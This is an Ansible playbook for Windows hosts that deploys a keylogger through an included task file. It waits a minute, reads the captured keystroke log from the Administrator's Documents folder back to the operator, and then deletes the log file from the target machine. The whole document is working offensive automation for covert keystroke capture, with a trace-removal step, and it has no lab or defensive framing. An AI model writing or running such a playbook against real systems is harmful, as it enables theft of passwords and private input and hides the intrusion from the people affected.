---
- name: Deploy Keylogger and Fetch Logs from Windows
  hosts: windows

  tasks:
    - name: Run keylogger_playbook.yml to deploy keylogger
      include_tasks: keylogger_playbook.yml

    - name: Wait for keylogger to gather data
      pause:
        minutes: 1

    - name: Check if keylog.txt exists
      win_stat:
        path: C:\Users\Administrator\Documents\keylog.txt
      register: keylog_file

    - name: Print keylogger log contents
      win_shell: type C:\Users\Administrator\Documents\keylog.txt
      register: keylog_output

    - name: Show keylog contents
      debug:
        var: keylog_output.stdout

    - name: Remove the log file from the Windows machine
      win_file:
        path: C:\Users\Administrator\Documents\keylog.txt
        state: absent
